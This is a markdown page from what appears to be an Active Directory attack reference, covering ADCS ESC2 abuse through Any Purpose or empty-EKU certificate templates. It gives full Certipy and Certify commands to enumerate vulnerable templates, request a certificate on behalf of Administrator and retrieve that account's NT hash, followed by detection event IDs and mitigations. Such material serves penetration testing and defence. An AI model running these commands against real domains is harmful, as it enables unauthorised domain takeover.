attack-28-esc2-any-purpose-eku-no-eku.md (4481B)
1 --- 2 title: "Attack #28 β ESC2 Any Purpose EKU No EKU" 3 description: "ESC2 exploits certificate templates configured with the \"Any Purpose\" Extended Key Usage (EKU) (OID 2.5.29.37.0) or no EKU at all. Such certificates areβ¦" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "privilege-escalation"] 7 tools: ["Certipy", "Certify", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/π’ Attack #28 β ESC2 Any Purpose EKU No EKU.md" 11 --- 12 # π’ Attack #28 β ESC2: Any Purpose EKU / No EKU 13 14 *** 15 16 ## π How It Works 17 18 ESC2 exploits certificate templates configured with the **"Any Purpose" Extended Key Usage (EKU)** (OID `2.5.29.37.0`) or **no EKU at all**. Such certificates are treated as universal β they can function as any EKU, including Client Authentication and Certificate Request Agent. This means a low-privileged user who enrolls for an ESC2-vulnerable certificate can use it as an **Enrollment Agent** to request certificates on behalf of any other user, including Domain Admins. 19 20 ### Vulnerable Template Conditions 21 22 - Template is published/enabled on a CA 23 - Low-privileged users (Authenticated Users / Domain Users) have enrollment rights 24 - EKU is set to "Any Purpose" OR is completely empty 25 - Manager approval is NOT required 26 - Authorized signatures are NOT required 27 28 *** 29 30 ## βοΈ Prerequisites 31 32 | Requirement | Detail | 33 |---|---| 34 | **Enrollment rights on ESC2 template** | Domain Users / Authenticated Users can enroll | 35 | **ADCS deployed** | Certificate Authority must be running | 36 37 *** 38 39 ## π οΈ Tools 40 41 | Tool | Platform | Notes | 42 |---|---|---| 43 | **Certipy** | Linux | `find -vulnerable`, `req` for enrollment | 44 | **Certify** | Windows | `find /vulnerable`, `request` for enrollment | 45 46 *** 47 48 ## π» Full Commands 49 50 ### π΅ Enumerate ESC2 Templates 51 52 ```bash 53 # ββ Certipy βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 54 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout 55 # Look for: [!] Vulnerabilities: ESC2 56 ``` 57 58 ```powershell 59 # ββ Certify βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 60 .\Certify.exe find /vulnerable 61 # Look for templates with "Any Purpose" or empty EKU 62 ``` 63 64 ### π΄ Exploit ESC2 65 66 ```bash 67 # ββ Step 1: Enroll for the ESC2 certificate βββββββββββββββββββββββββββββββββββ 68 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 69 -template VulnTemplate -dc-ip 10.10.10.10 70 71 # ββ Step 2: Use as enrollment agent to request cert as Administrator ββββββββββ 72 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 73 -template User -on-behalf-of 'corp\Administrator' \ 74 -pfx low_user.pfx -dc-ip 10.10.10.10 75 76 # ββ Step 3: Authenticate with the Administrator certificate ββββββββββββββββββ 77 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 78 # Returns NT hash for Administrator 79 ``` 80 81 ```powershell 82 # ββ Certify (Windows) βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 83 .\Certify.exe request /ca:CORP-CA /template:VulnTemplate 84 # Use resulting cert as enrollment agent for further requests 85 ``` 86 87 *** 88 89 ## π‘οΈ Detection β Event IDs 90 91 | Event ID | Source | What to Look For | 92 |---|---|---| 93 | **4886** | Security Log (CA) | Certificate enrollment β track low-priv users enrolling for any-purpose templates | 94 | **4887** | Security Log (CA) | Certificate request approved | 95 | **4768** | Security Log (DC) | PKINIT TGT request using the forged certificate | 96 97 *** 98 99 ## π Attack Chain Context 100 101 ``` 102 [ESC2] βββ Any Purpose cert β Enrollment Agent β impersonate any user 103 β 104 ββββ π Used as stepping stone to ESC3-style enrollment agent abuse 105 ββββ π Low-priv user β DA certificate β domain compromise 106 ββββ π Defeated by: restrict EKUs, require approval, audit enrollment 107 ``` 108 109 *** 110 111 > β **Attack #28 β ESC2 complete.**